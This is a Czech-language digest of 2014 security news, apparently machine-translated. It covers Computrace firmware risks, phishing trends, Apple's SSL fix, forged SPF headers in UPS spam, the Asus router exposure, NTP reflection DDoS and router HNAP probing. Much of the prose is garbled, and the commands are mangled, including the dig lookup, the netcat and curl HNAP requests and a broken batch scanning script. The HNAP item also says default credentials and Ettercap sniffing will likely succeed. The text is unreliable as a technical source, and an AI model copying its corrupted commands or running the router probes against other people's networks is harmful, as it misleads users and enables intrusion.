ProLiant pouze. Konkrétně, v rámci ProLiant jsme nejsou uvedení požadavků nárokových na MOP, I / O, nebo firmware řadiče,. jsme pouze opravňuje ProLiant systém ROM a komplexní programování logických zařízení (CPLD) firmware


Absolute Computrace software anti-krádež může být dálkově unesen
22.2.2014 Bezpečnost
Výzkum v oblasti bezpečnosti tým společnosti Kaspersky Lab vydala zprávu potvrzující, a které prokazují, že slabá implementace softwaru na ochranu proti krádeži trh Absolute Software může obrátit užitečnou obrannou nástroj do mocný nástroj pro cyberattackers. Ve stealth způsobem, že tato chudá implementace umožňuje útočníkům plný přístup ke miliony počítačů uživatelů. Zaměření výzkumu bylo Absolute Computrace Agent, který je umístěn ve firmware, nebo PC ROM BIOS, moderních notebooků a stolních počítačů. Hlavním důvodem tohoto výzkumného projektu byl objev Computrace Agent běží na několika soukromých počítačích výzkumných pracovníků společnosti Kaspersky Lab a firemní počítače bez předchozího povolení. Zatímco Computrace je legitimní produkt vyvinutý Absolute Software, někteří majitelé systémů prohlašoval, že oni nikdy nainstalován, aktivuje nebo kdy poznal o tomto software na svých počítačích. Většina tradičních pre-nainstalovány softwarové balíky mohou být trvale odstraněny nebo zakázány uživatelem, ale Computrace je navržen tak, aby přežil profesionální systém čištění a výměnu i pevného disku. uživatel může mylně rozpoznat Computrace jako škodlivý software, protože používá mnoho triků populární v moderní malware:. anti-ladění a anti-reverzní inženýrství techniky, injekce do paměti jiných procesů, vytváření tajných komunikací, záplatování systémové soubory na disku, udržet konfigurační soubory zašifrovány, a klesá spustitelný přímo z Windows BIOS / firmware Statistika:

Podle Security Network Kaspersky, tam je přibližně 150 tisíc uživatelů, kteří mají Computrace Agent běžící na svých strojích. Odhadovaný celkový počet uživatelů s aktivovaným Computrace Agent může být vyšší než 2 milióny. Je to jasné, kolik z těch uživatelů vědět o Computrace běží na svých systémů.
Většina z těchto počítačů se nachází ve Spojených státech se a Ruskem.
Síťový protokol používaný Computrace Agent Small poskytuje základní funkce pro vzdálené spuštění kódu. Protokol nevyžaduje použití jakéhokoliv šifrování nebo ověřování vzdáleného serveru, který vytváří mnoho příležitostí pro vzdálené útoky v nepřátelském prostředí sítě. útoku platformu Neexistuje žádný důkaz, že absolutní Computrace je používán jako platforma pro útoky. Nicméně, odborníci z několika společností, viz možnost útoků, některé alarmující a nevysvětlitelné skutečnosti nepovolených Computrace aktivací, aby to více a realističtější. Zpět v roce 2009, výzkumníci z Core Security Technologies představila svá zjištění na Absolute Computrace. Vědci varovali o nebezpečích této technologie a jak by útočník mohl upravit registr systému unést zpětná volání z Computrace. Agresivní chování Computrace Agent byl důvod, proč byl detekován jako malware v minulosti. Podle některých zpráv Computrace byla zjištěných společností Microsoft jako VirTool: Win32/BeeInject. Nicméně detekce byla později odstraněna společností Microsoft a některé anti-malware dodavatelů. Computrace spustitelné soubory jsou v současné době na bílé listině většina anti-malware společnosti.


Přenos a zálohování obsahu s duálním USB od společnosti SanDisk
22.2.2014 Bezpečnost
SanDisk oznámila SanDisk Ultra Dual USB disk, USB flash disk představovat jak mikro-USB a USB 2.0 konektor v elegantním a robustním provedení. Je určen pro Android uživatele, kteří potřebují přesunout obsah ze svých mobilních zařízení.

Zatímco jiné metody přenosu souborů z mobilního zařízení k počítači vyžaduje dráty, aplikace nebo bezdrátový set-up, SanDisk Ultra Dual USB disk prostě musí být připojen k mobilním zařízením s podporou funkce USB on-the-Go (OTG) pro přístup až 64 GB "plug and play" skladovací kapacitu. Navíc duální porty USB měniče mají zatahovací kryt, což znamená, žádné čepice ztratit, zatímco ještě drží konektory bezpečí. SanDisk dělá správu obsahu i jednodušší aplikace SanDisk Memory Zone . S tím, uživatelé jsou schopni lépe organizovat soubory uložené na interní a externí paměti telefonu pro správu, prohlížení, kopírování a zálohování - další zmírnění potíží uvolnění paměti na svém mobilním zařízení.


Vystavení ziskovost soukromých dat
22.2.2014 Kriminalita
Narušení bezpečnosti, počítačoví zločinci, a organizované útoky dělal to téměř nemožné, aby osobní a finanční údaje soukromé, podle Trend Micro.

Tato výroční zpráva poskytuje vhled do zranitelností dnešní technologií, které se rychle stávají vzájemně propojeny a "inteligentní". Bohužel, nová technologie zaváděná může poskytnout více příležitostí pro zločince, aby se daří, jak se vyvíjejí jejich kybernetických útoků a ohrožení podniku, včetně on-line bank a obchodů, zatímco se pohybuje blíže k domovům a jednotlivce prostřednictvím mobilní technologie. "Loni zahrnovalo velkou bezpečnost porušení, zvýšená malware a hrozby pro mobilní zařízení, které ovlivnily lidi ze všech oblastí života po celém světě, "řekl Raimund Genes, CTO společnosti Trend Micro. "Nyní více než kdy jindy, spotřebitelé a korporací musí být vytrvalí v pochopení jejich zranitelnosti, a to, co by mělo být provedeno z bezpečnostního hlediska lepší ochrany osobních údajů a ochranu proti oslabenou soukromí. Zatímco tato zpráva popíše hrozeb roku 2013, je ještě důležitější to vysvětluje, jak se tyto hrozby budou i nadále vyvíjet a co by mělo být provedeno s cílem snížit negativní dopad ". Zpráva zdůrazňuje, patří: Finanční hrozby: Jak on-line bankovní malware, který se přímo zaměřují finance obětí zesílil po celém světě v letošním roce, plodný ransomware zvýšil a se vyvinul do Cryptolocker v průběhu celého roku. Mobilní hrozby: Došlo značný nárůst jak objemu a propracovanosti mobilních hrozeb, jako hrozby na bázi PC převedeni na mobilní platformy. Do konce roku 2013, jsme viděli celkem 1,4 milionu škodlivých a rizikových Android aplikací jsou označeny. A uživatelé Apple nejsou imunní. 2013 došlo k nárůstu phishingových útoků konkrétně zaměřených na uživatele Apple jako zločinci rozpoznat potenciální výnos z této instalace základny. Osobní soukromí: Prostřednictvím sociálních sítí a "osobní cloud" účty, osobní soukromí se stal opakující se problém. Agresivní phishing útoky na koni na vydání populárních výrobků, jako jsou PS4 a Xbox One objevil ohrozit osobní informace. útoky na infrastrukturu: High-profil incidenty infrastruktury terčem kybernetických útoků se stal realitou v Jižní Koreji, ukazuje, jak důležité operace může být . dopad na širokém měřítku nepodporovaný software: 2013 viděl zvýšení povědomí o nepodporovaných verzí Java a Windows XP, který bude prezentovat rozšířené bezpečnostní problémy, jako záplaty a aktualizace skončí, když podpora pro systém Windows XP končí dubna 2014.


Rodiče se obávají, že jejich děti jsou vystaveny on-line hrozbami
22.2.2014 Bezpečnost
Více než čtvrtina (27 procent) rodičů věří, že jejich děti byly vystaveny nebezpečí na internetu, jako je například přístup k nevhodnému obsahu nebo kybernetické šikany v posledních 12 měsících, podle studie společnosti Kaspersky Lab. Přes toto, výzkum označit za bezpečnější internet Den koná dne 11. února bylo zjištěno, že jeden z pěti rodičů (22 procent) nepodnikne žádné kroky řídit on-line svých dětí aktivitu -. ať už na domácí počítač nebo mobilní zařízení "Bez ohledu na to, jak jejich děti přístup na internet, rodiče musí zůstat ostražití, dohlížet na jejich využívání internetu a zvážit rodičovské kontroly technologie. Nicméně, jako rodič sám, zjistil jsem tyto statistiky obzvláště znepokojující, když vezmete v úvahu rostoucí počet dětí pomocí připojených smartphony dnes. Koneckonců, když děti používají mobilní zařízení k přístupu webu, které používají stejnou internetu, se stejnými riziky - ale rodiče často nejsou tak vědomi nebezpečí, "říká David Emm, senior bezpečnostní výzkumník společnosti Kaspersky Lab. Studie také zjistila, že 18 procent rodičů ztratil peníze nebo data z jejich osobní zařízení v důsledku nekontrolovaného přístupu jejich dítěte. S smartphone apps často obviňováni v tisku pro děti nechtěně utrácet stovky liber, účinných kontrol a otevřené komunikační kanály kolem používání smartphone je nezbytně nutné. David Emm pokračuje: "Je mylná představa, že chytré telefony a tablety nepotřebují stejnou úroveň ochrany jako PC, ale s tak vysokým procentem rodičů, které nemají jasný pohled on-line jejich dětské aktivity, tento způsob myšlení se musí změnit. internetové připojení je neuvěřitelný zdroj, a to jak pro společenské využití a vzdělávací kapacity . ale stejným způsobem, jako bychom naučit své děti, aby přes silnici bezpečně, musíme se naučit je být si vědom, a vzhledem, nebezpečí na internetu. Jen proto, že hrozba je mimo dohled, neznamená to, . bychom neměli držet to přední mysli " ​​David Emm nabízí následující tipy, aby zůstali v bezpečí on-line: 1. Oba Android smartphony a iPhone jsou vybaveny vestavěným rodičovské kontroly - při nákupu smartphone, požádat asistenty prodeje k prokázání těchto funkcí. Mají politiky v místě a odpovědnost, aby se rodiče vědomi z nich. Vytvořením poptávku, to je více pravděpodobné, že bude, aby ostatní rodiče vědí. 2. Použít nastavení, které brání in-app nákupech ušetřit pádný účty by měly děti narazí na hru s drahými doplňky. 3. Nainstalujte bezpečnostní software - tito poskytovatelé budou nabízet aplikace odfiltrovat nevhodný obsah, například, pro dospělé obrazy a odesílatelů obtěžující SMS zpráv. 4. Povzbuďte děti, mluvit o jejich online zkušenosti a zejména, cokoli, co z nich dělá nepříjemné nebo ohrožen. Otevřete komunikační kanál tak mají pocit, že mohou diskutovat ve všech oblastech svého života, on-line bez strachu z rozsudku nebo pokárání. 5. Ochrana dětí před kybernetickými tyrany je obzvláště náročné s chytrými telefony, protože mohou být zaměřena v mnoha ohledech, a to zejména z pohledu jejich rodičů. Zabývat se kybernetické šikany, jako byste v reálném životě podporou děti být otevřený a mluvit důvěryhodného dospělého, pokud se u nich objeví nějaké výhružné nebo nevhodné zprávy. Čísla a kontakty na aplikace mohou oba být blokovány, pokud se dělají děti nepříjemné.


Jak crimeware vyvíjí, zvýšit phishingové útoky
22.2.2014 Phishing
Počet phishingových kampaně vzrostl o více než 20 procent ve třetím čtvrtletí roku 2013, s crimewaru útoky vyvíjí a množí, podle APWG.

Celkový počet unikátních phishingových internetových stránek pozorovaných zvýšil na 143.353 ve 3. čtvrtletí, a to až od Q2 je 119101. Tento nárůst je obecně přičíst rostoucí počet útoků proti legalizaci-přenos a maloobchodní / e-commerce webové stránky. Ve stejném období, tam byl 8 procent pokles počtu značek, na něž phisherů, jako počet značek cílené spadl z all-time high 441 v dubnu 2013 - 379 v září 2013. útoku pokračoval se vyvinout, umístěním sociální média v čele crimewaru v čele v prvním čtvrtletí. "Ve 3. čtvrtletí roku 2013, jsme také viděli změnu phishing témat používané malware autoři. Důraz na sociální média-themed témat, jako je například "Výzva pro připojení na LinkedIn", byl používán k nalákání uživatelů, kteří budou zvyklí na taková témata, "řekl APWG přispěvatelem Carl Leonard z Websense Security Labs. APWG člen PandaLabs katalogizovány téměř 10 milionu nových crimewaru vzorky od července do září, a PandaLabs poznamenal, že počet nových vzorků malwaru v oběhu v prvních devíti měsících roku 2013 byl vyšší než v úhrnu za celý rok 2012. Více než 59 procent počítačů v Číně se zdá být napaden s malware nebo spyware, rekordní pro každou zemi. Úplná zpráva je k dispozici zde .


Aktualizace Apple iOS a Apple TV
22.2.2014 Zranitelnosti

Apple rozeslal 3 bulletiny a aktualizace OS dnes (iOS 6.1.3, iOS 7.0.6, a Apple TV 6.0.2), všechny, kterým se stanoví chybu, která by mohla povolit SSL / TLS spojení být citlivé na nezjištěný man-in-the- střední útoky. Všechny tři aktualizace sdílejí stejné číslo CVE CVE-2014-1266. Aktualizace stránky Apple Bezpečnost dosud Zdá se, že aktualizace uvedené tam, ale měly by tam být krátce (může tam být v době, kdy budete číst tento). Pokud máte zařízení Apple se systémem iOS 6 nebo 7, nebo Apple TV, asi byste měli používat tyto aktualizace ASAP.

Ref: Aktualizace zabezpečení Apple strana - http://support.apple.com/kb/HT1222


UPS Malware Spam Použití Fake SPF záhlaví
22.2.2014 Viry

"Sender Policy Framework" je jednoduchý systém pro identifikaci, které poštovní servery mohou posílat e-maily jménem vaší domény. Mluvili jsme o tom (a jiné normy, jako je DMARC, DKIM) před.

Tyto systémy jsou obvykle realizovány na svých e-mailových bran. Odchozí brána podepíše e-mail pomocí domény klíč (pro DKIM). Přijímací mailová brána zkontroluje, zda jsou přítomny a správné záhlaví. Mail Gateway se pak přidá speciální hlavičku s výsledkem kontroly, a to speciální hlavička se pak použije spam filtry se rozhodnout, zda zachovat e-mail (nebo ne).

Zdá se, že spammeři se učí a našel způsob, jak oklamat některé špatně nakonfigurované poštovní brány a spam filtry. Spammer přidá hlavičku o tom, že e-mail prošel ověření SPF. William nám poslal vzorek UPS tématickém e-mailu, který obsahoval škodlivý přílohu. To zahrnovalo následující záhlaví:

Předmět: UPS Delivery Notification sledovací číslo: <random řetězec>
Datum: Po. 17.únor 2014 11:56:04 -0300
Od: UPS Quantum View <auto-notify@ups.com>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
Message-ID: <3b8bfaf8-830d-4804-94fa-96cf3eb3c052@ups.com> Received-SPF: průchod (google.com: doména no-replay@ups.com se jmenuje 192,123. 32.83 jako povolené odesílatele) klient-ip = 192.123.32.83, Received: od 192.123.32.83 (EHLO mailer.ups.com) (192.123.32.83) Received: by mailer.ups.com (Postfix, z userid 1000) id A838D7824B; X-Mailer: MIME-tools 5.41 (Entity 5,404) X-Message-Status: s1: 0 X-SID-PRA: UPS Quantum View <auto@ups.com> X-SID-Výsledek: TempError konverze-S-Loss: ano

Červená čára ukazuje, že e-mail prošel ověření SPF. Nicméně, pokud jste kontrolu záznam UPS.com SPF:

$ Dig + krátký TXT ups.com
"V = spf1 IP4: 153.2.232.0/22 ​​IP4: 192.55.236.50/31 IP4: 113.106.161.16 IP4: 113.106.161.18 IP4: 12.104.201.4/31 patří: custhelp.com patří: commerceplus.com.au-all"

Není tam žádná zmínka o 192.123.32.83. Záhlaví přidala odesílatele, ne přijímací mailové brány.
(Budete muset zkontrolovat domén "patří" stejně. Odjíždím jako cvičení pro čtenáře).

Pokud se rozhodnete SPF kontrolu na příjem e-mailu brány, budete muset ujistěte se, že nejprve zbavit všech stávajících SPF záhlaví označující SPF zpracování. V opačném případě odesílatel mohl přidat falešné hlavičky, jako je výše.


K soukromým datům má kvůli chybě routeru přístup kdokoli
19.2.2014 Incident
Žádné hluboké znalosti síťových protokolů a prolamování promyšlených hesel. K cizím datům se může dostat prakticky kdokoliv kvůli bezpečnostní chybě v některých routerech od Asusu. Právě kvůli této trhlině získá nezvaný návštěvník přístup k připojeným síťovým diskům. Upozornil na to ve středu server Cnet.
Tato zranitelnost je o to vážnější, že přístup k datům na cizích flashkách nebo externích discích připojených k routerům od Asusu může získat každý, kdo zadá do internetového prohlížeče nebo FTP klienta IP adresu zařízení (unikátní adresa pro každý přístroj v prostředí internetu).

Poté se mu hned zobrazí všechna uložená data, není potřeba obcházet žádné sofistikované zabezpečení. Tento postup vyzkoušely Novinky v praxi a skutečně funguje.

Dostat se k cizím datům je otázka pár vteřin. Stačí znát IP adresu postiženého zařízení.

Trhlina přitom není podle bezpečnostních expertů nijak nová. Jak připomněl server Ars Technica, hlášena společnosti Asus byla již v loňském roce. Přestože je záplata již k dispozici, v ohrožení je stále několik tisícovek uživatelů. Opravu je totiž nutné nainstalovat manuálně, což řada lidí ani neví.

Internetem začal totiž kolovat seznam více než 13 000 IP adres postižených routerů.
Velmi závažný začal být problém před dvěma týdny. Internetem začal totiž kolovat seznam více než 13 000 IP adres postižených routerů. Drtivá většina z nich je navíc skutečně pravá.

Hacker pomáhá chránit data
Vyřešit problém a zachránit lidem data se pokusil v minulých dnech hacker vystupující pod přezdívkou /g/. Začal se lidem „nabourávat“ na disky připojené k bezdrátovému směrovači, kam jim nahrává textový soubor s informacemi o trhlině a o tom, jak ji zazáplatovat.

V podstatě stačí na webu Asusu najít stránku svého routeru, kde jsou v záložce podpora ke stažení všechny dostupné aktualizace. Řešením je samozřejmě i odpojení externích disků a flashek.

Zabezpečení je podceňováno
Bezpečnostní problémy spojené se síťovými prvky, prostřednictvím kterých přistupují lidé k internetu, nejsou nijak výjimečné. Naopak, setkávat se s nimi budeme stále častěji, což dokládá i aktuální hrozba týkající se routerů značky Linksys.

„Výzkumníci institutu SANS objevili nového samoreplikujícího se červa, který napadá různé domácí a routery značky Linksys. Analytici zatím nezjistili, zda je v červu zabudován nějaký nebezpečný kód či zda se červ připojuje na nějaký server,“ varoval analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.

Lidé by proto měli důsledně instalovat všechny aktualizace, které jsou pro jejich síťové prvky dostupné. V současné době totiž není výjimkou, že se v domácnostech objevují i několik let staré přístroje, na které nebyla nikdy nainstalována žádná oprava.


Dost mobilní benevolence aneb McAfee se vrací

19.2.2014 Mobil
John McAfee, nepřehlédnutelná postava bezpečnostní scény, která se po mnoha letech znovu zviditelnila na mnoha excesech, plánuje nový produkt – aplikaci Cognizant pro Android.

John McAfee za poslední rok uveřejnil několik videí a blogů, ve kterých si vyřizoval účty se státy, kritiky, neváhal ani kritizoval kvalitu stávajících produktů své bývalé firmy, která kdysi definovala standardy antivirových produktů. Nakonec ale překvapil tím, že se rozhodl vrátit k aktivnímu vývoji bezpečnostních řešení.

První z jeho nových produktů by se měl objevit na scéně 1. března, kdy bude uveden Cognizant, bezplatná aplikace pro mobilní zařízení platformy Android. Své uživatele by měla chránit především před naprosto nekontrolovatelným přiřazováním práv, které podstupují s každou nově nainstalovanou aplikací. Je pravda, že operační systém Android vypíše práva, kterých se aplikace dožaduje, bohužel uživatel může pouze souhlasit, nebo povolení k instalaci zrušit.
Opecné oprávnění aplikací

Právě tento přístup ke správě práv je velmi nešťastný. Uživatel nemá právo detailněji pracovat s politikami, pokud bude například aplikaci typu Zápisník používat pouze pro své „lokální“ poznámky bez potřeby něco synchronizovat přes internet, je pro něj zbytečné bezpečnostním rizikem, aby taková aplikace měla práva iniciovat internetové spojení nebo ještě absurdnější práva, jako je formátovat lokální úložiště, zjistit polohu zařízení nebo kopírovat kontakt ze seznamu.

Cognizant si klade za cíl vrátit možnost věci alespoň trochu ovlivňovat do uživatelových rukou. Aplikace funguje na stejném jádru, které by mělo být základem budoucího produktu D-Central. Překvapivě rychlé uvedení aplikace může souviset s nedávno uniklou informací o tom, jak NSA těží citlivá data z řady mobilních aplikací, včetně populárních Angry Birds. Nikdo ale nepochybuje, že v menším měřítku (především díky menším rozpočtům, nikoli kvůli větším zábranám) se podobně snaží i jiné vlády a velké i malé zločinecké organizace.
Nové bezpečnostní řešení

John McAfee je stále nepřehlédnutelná postava světa ICT, ikona bezpečnosti a nepochybně velmi schopný člověk. Již jednou se mu podařilo vystavět bezpečnostní firmu v době, kdy většina nebezpečí internetu byla podceňována nebo prostě neznáma, firmu, která byla nakonec zhodnocena a prodána za 7,6 miliardy dolarů. Je evidentní, že dnešní John McAfee si velmi osvojil techniky technologických startupů – vývoj řídí z Montrealu prostřednictvím videokonferencí a virtuálních schůzek a je velmi pravděpodobné, že se můžeme těšit na působivý a po několika rychlých iteracích velmi užitečný produkt.


Podvodníci napálili stovky tisíc lidí, pomalu jim vysávají peníze přes telefon

18.2.2014 Mobil

Rozmachu chytrých telefonů jsou si vědomi i počítačoví piráti. Internetem tak koluje celá řada škodlivých mobilních aplikací, které jim pomáhají odsávat peníze z účtů jiných lidí. Podle analýzy bezpečnostní společnosti Pandalabs se kyberzločincům podobným způsobem podařilo nakazit více než 300 000 zařízení s operačním systémem Android.
Podvodníci se snaží důvěřivce většinou nalákat na nejrůznější hry, výjimkou nejsou ale ani aplikace pro organizaci času nebo asistenti pomáhající s hubnutím. Podobné aplikace mají vždy společný základ – jejich instalací uživatel dovoluje odesílat prémiové SMS zprávy.

Právě kolonkám, které informují o různých oprávněních aplikace, nevěnuje většina lidí při instalaci žádnou pozornost. Že se nechali počítačovým pirátem napálit, tak zpravidla poznají až z tučného výpisu telefonního účtu.

Podvodnými aplikacemi si kyberzločinci přišli na více než 120 miliónů korun.
„Již bylo infikováno nejméně 300 000 uživatelů OS Android. Čtyři nalezené aplikace, které jsou sice zdarma, ale mají potají přidanou funkci premium SMS, se jmenují ‚Easy Hairdos‘, ‚Abs Diets‘, ‚Workout Routines‘ a ‚Cupcake Recipes‘,“ varoval analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.

Výzkumníci ze společnosti Pandalabs odhadují, že těmito podvodnými aplikacemi si kyberzločinci přišli minimálně na šest miliónů dolarů, tedy na více než 120 miliónů korun. Toto číslo však nemusí být ani zdaleka konečné, protože internetem koluje daleko více podvodných programů.

Podvodná kopie populární hry
Například minulý týden se ukázalo, že počítačoví piráti zneužívají i populární hru Flappy Bird. Podvodné verze tohoto titulu vypadají do posledního puntíku stejně jako originál. Dokonce mají na ploše i stejnou ikonu. Poznat je navíc není vůbec jednoduché, protože internetem kolují i neinfikované kopie Flappy Birdu. [celá zpráva]

Flappy Bird

„Falešné aplikace na rozdíl od těch legitimních zneužívají zpravidla mobilní přístroje k platbám za prémiové služby. Odesílání SMS zpráv na placená čísla lidé odhalí zpravidla pozdě, až po příchodu velmi vysoké faktury,“ varovali bezpečnostní experti z laboratoří TrendLabs.

Podvodné aplikace zatím bezpečnostní experti zachytili na přístrojích s operačním systémem Android. Podle nich se však kopie Flappy Birdu objevují především na různých diskuzních fórech a alternativních internetových tržištích, nikoli v oficiálním obchodu pro Android.

Lidé podceňují zabezpečení
Důvod, proč se počítačoví piráti stále častěji zaměřují na chytré telefony a počítačové tablety, je prostý. Zatímco na zabezpečení klasických počítačů si lidé již zvykli, ochrana mobilních přístrojů je většinou nijak netrápí. A právě to je kámen úrazu.

Na tabletu i smartphonu byl měl být samozřejmostí antivirový software. Vhodné je také stahovat aplikace pouze z legitimních zdrojů a v každém případě kontrolovat oprávnění, co který program může skutečně vykonávat bez autentizace majitele.


NTP reflexe útoky
18.2.2014 Počítačový útok

Jak jsme zde diskutovali v lednu, došlo k výraznému nárůstu velkých Network Time Protocol (NTP) reflexe DDoS útoky. V takovém útoku, útočník odešle vytvořený paket, který vyžaduje velké množství dat, které je nakonec odeslána na falešnou hostitele.

V našem předchozím příspěvku [1], jsme diskutovali v detailu příkazu "monlist", ale není to jen "monlist", které mohou být zneužity, ale mnoho level-6 a level-7 příkazy jako "showpeer", "sysstats", "vrstevníky "," listpeers ".

Chcete-li uzamknout serveru NTP, prosím, sledujte náš předchozí příspěvek a upgrade verzi NTP, jak je uvedeno US-Cert zde [2].

Navíc, jak FYI, nedávný americký Cert upozornění [3] identifikovat další možné zdroje zesílení útoků UDP a je doporučeno zkontrolovat.

Pro ty, kteří si, dobře, že se to nestane, aby mě nebo "Koho to zajímá, DDoS útoky byly děje od roku 1999" v letošním roce již prokázala nadměrný počet veřejných útoků pomocí NTP, vytváří zničující záplavu provozu komukoliv bez vrcholu zmírnění zářez * opatření postavili. A my jsme až v únoru.

Web Brian Krebsova je, reportér, že psát o kybernetické bezpečnosti příběhy, byl zasažen 200Gbps NTP provozu v průběhu minulého týdne [4]. Brian zprávy, jak a kým zahájila útok na detail příběhu, který je dobře stojí za to číst. Není to jen malé cíle, od začátku roku 2014, jak je zde uvedena, mnoho on-line webové stránky herních byly zaměřeny pomocí těchto reflexe typu útoků se útočníci přičemž na Twitter oznamuje blížící se záchvat a později slunit na slávě. Nejnovější Arbor zpráva [5] hovoří o tom v dalším podrobněji zmiňuje útoky až 309Gbps ​​a jména příslušné Twitter ID tweeting o DDOS. Cloudflare uvedla, že útok viděli na začátku tohoto týdne bylo 400Gbps. Samotná velikost těchto útoků znamenat, že prostě nemají rozbít cíl, ale významné oblasti Internetu, tj. velké vedlejší škody.

Pokud vidíte NTP reflexe útoky jsou zaměřeny směrem k vám, standardní nejlepší praxe vyplývá -

• Naneste ACL do obvodové síti a pokud možno proti proudu

• Práce s vaším ISP (y), aby učinili totéž [6]

• Uzamkněte své vlastní NTP servery a další UDP-naslouchání servery

• Pokud zjistíte otevřené NTP servery, hlásit je do projektu Otevřená NTP [7]

Pro ty, kteří hledají šikovné DDoS stručná referenční příručka vysvětluje různé DDoS útok http://www.us-cert.gov/sites/default/files/publications/DDoS% 20Quick% 20Guide.pdf

* Pro většinu podniků DDoS zmírnění má finanční náklady spojené s tím, že zvyšuje směrem nahoru pro zvýšení ochrany

[1] https://isc.sans.edu/diary/NTP+reflection+attack/17300
[2] https://www.us-cert.gov/ncas/alerts/TA14-013A
[3] https://www.us-cert.gov/ncas/alerts/TA14-017A
[4] http://krebsonsecurity.com/2014/02/the-new-normal-200-400-gbps-ddos-attacks/
[5] http://www.arbornetworks.com/asert/2014/02/ntp-attacks-welcome-to-the-hockey-stick-era/
[6] http://www.ietf.org/rfc/rfc3704.txt
[7] http://openntpproject.org/


Skenování na aplikaci Symantec Endpoint Protection Manager
18.2.2014 Bezpečnost

Minulý týden jsme se zmínili o novou chybu zabezpečení v aplikaci Symantec Endpoint Protection řízení [1]. Podle poradenské společnosti Symantec, tento produkt naslouchá na portu 9090 a 8443/TCP. Oba porty jsou pravidelně testovány na různé zranitelnosti, zejména 8443, je, že to je tím, webových serverů často používají jako alternativa k 443.. Nicméně, 7. února, jsme zjistili značný nárůst vyšetření pro oba porty.

Zajímavé je, že to vypadá, že dvě různé IP adresy způsobilo tento nárůst, skenování pouze za každý jeden port.

217.174.250.228 je "silák" na portu 8443, a 125.217.252.183 pro portu 9090. Neexistuje žádná organizační propojení mezi dvěma IP na základě Whois.

125.217.252.183 je přiřazen k univerzitě v Číně (whois záznam obsahuje trochu divně vypadající "popis": ~ {; * DO @ M9 $ 4SQ '~}). 217.174.250.228 je přiřazen k britské hostingové společnosti.

Můj předpoklad je, že oba hostitelé byly ohroženy v té době.

V současné době jsme také svědky velký nárůst skenování na portu 9090 , ukazuje na někoho, kdo staví cílovou seznam ohrožených systémů. Docela hodně jediným zdrojem skenování dnes je 113.010.155.079 . Tato adresa je zajímavý v tom, že není přiřazen podle APNIC (RIV na starosti tuto adresu), ale to reagovat na ping. To provozuje webové stránky phpMyAdmin jako výchozí hostitel, který do značné míry zaručuje, že je oslabený systém (může ve skutečnosti být také honeypot).

[1] http://www.symantec.com/docs/TECH214866


HNAP - Co je to, jak ji používat, jak najít to
18.2.2014 Bezpečnost

Měli jsme spoustu diskusí o nejnovější sady domácí router zranitelnosti na základě protokolu HNAP (viz čtvrteční příběh napsal Johannes: https://isc.sans.edu/diary/Linksys+Worm+% 22TheMoon% 22 + Celkem% 3A + Co + + my víme + tak + far/17633 ). Ale co je HNAP protokol, a proč je tak trvale zapnutý?

HNAP (Home Network Administration Protocol) je protokol pro správu zařízení sítě, vhodné pro každého, ale myslím, že primárně určeny pro ISP pro správu flotily zařízení rozmístěných v rámci předplatného k internetu. To se vztahuje v patentu US 20070130286 ( http://www.google.com/patents/US20070130286 ), a je dobře popsána v dokumentu Cisco zde nalezeno http://www.cisco.com/web/partners/downloads/guest/ hnap_protocol_whitepaper.pdf

protokol byl patentován původně čistě sítě, ale protokol je nyní ve vlastnictví a implementace byla převedena společností Cisco. Takže pro zařízení, která by mohla potenciálně být nasazeny a řízených ISP, nebo dokonce korporace na dálkové stránek, chcete protokol řízení, který je ve výchozím nastavení zapnuta a je obtížné pro vzdálený uživatel vypnout. Nebo z některých zpráv, na některých zařízeních tento protokol zůstane zapnutý i po vašem vypněte jej (pardon, trochu tam přetrvávají). A ano, ironie někoho "v biz" rozhodujícím v roce 2007, že ještě potřebujeme další clear- protokol pro správu sítě textu se mi utéct. Vzhledem k tomu, HNAP používá SOAP, můžete použít HTTPS jako dopravní, ale zranitelnosti k dnešnímu dni byly většinou jasné textu a základní info přístroj dotaz je ve formátu prostého textu.

Jak Johannes popsáno včera, snadno Linux / OS X způsob, jak testovat HNAP je:

echo "GET / HNAP1 / HTTP/1.1 \ r \ nHost: test \ r \ n \ r \ n" | nc routerip 8080

Co ještě můžete dělat s HNAP? Můžete také jen vytáhnout na stránku základní "Get Info" zařízení pomocí prohlížeče klienta, wget nebo curl (můžete dostat jak z těchto nástrojů pro Windows)

wget http://routerip/HNAP1/
nebo stočit http://routerip/HNAP1
nebo nasměrujte prohlížeč na http://routerip/HNAP1

Dávám přednost použití zvlnění na to. Snadné skriptu, a od té doby HNAP je založen SOAP, můžete tak učinit požadavků SOAP (pomocí POST namísto GET) pomocí curl (-X POST-H "bez ohledu na vaše mýdlo je řetězec")

Jaký výkon se dostanete z tohoto jednoduchého příkazu dotazu? Získáte základní informace o zařízení, jakož i seznam jiných platných SOAP příkazy můžete poslat na vaše konkrétní zařízení:

C: \> curl http://192.168.1.1/HNAP1 <xml version = "1.0" encoding = "utf-8">? <soap: Envelope xmlns: xsi = "http://www.w3.org/ 2001/XMLSchema-instance "xmlns: xsd =" http://www.w3.org/2001/XMLSchema "xmlns: mýdla =" http://schemas.xmlsoap.org/soap/en velope / "> <soap: body> <GetDeviceSettingsResponse E4200 </ ModelDescription> <ModelName> E4200 </ ModelName> <FirmwareVersion> 1.0.04 build Bezdrátový

Většina z těchto dalších příkazů HNAP vyžadují ověřování a v mnoha případech HTTPS šifrování (v závislosti na provedení přístroje), ale výchozí pověření pro domácí routery jsou dobře známy a vaše šance na úspěch jsou dobré, pokud skenujete pomocí nich - ve většině případů vlastní -podepsané certs jsou ve hře, i když jste "muž uprostřed" čichání důvěryhodně provozu s nástrojem, jako je Ettercap, je pravděpodobné, že bude úspěšný. A samozřejmě HNAP využije neobtěžujte s hloupými věcmi, jako pověření vůbec.

Využije proti HNAP nejsou ničím novým - se vrátit k papíru 2010 www.sourcesec.com / Lab / dlink_hnap_captcha.pdf , který popisuje hacking DLink směrovače.

Takže, co je to nejjednodušší způsob, jak vytvořit výčet síť pro HNAP zařízení? Například, pokud chcete skenovat váš domov nebo pracovní sítě z neznámých / neoprávněným HNAP služby? HNAP1 dotaz samozřejmě se dostanete to, co chcete, můžeme použít to, co jsme se naučili tak daleko, aby rychle napsat "chkhost.cmd" dávkový skript pro Windows:

@ Echo off
REM syntaxi: chkhost.cmd host.ip.add.ress
ping-n 2% 1 | findstr "time ="> nul
, pokud errorlevel == 1 goto endend
REM Host je nahoru, nyní zkontrolovat HNAP
curl-s http :/ /% 1/HNAP1 | findstr "HNAP"> nul
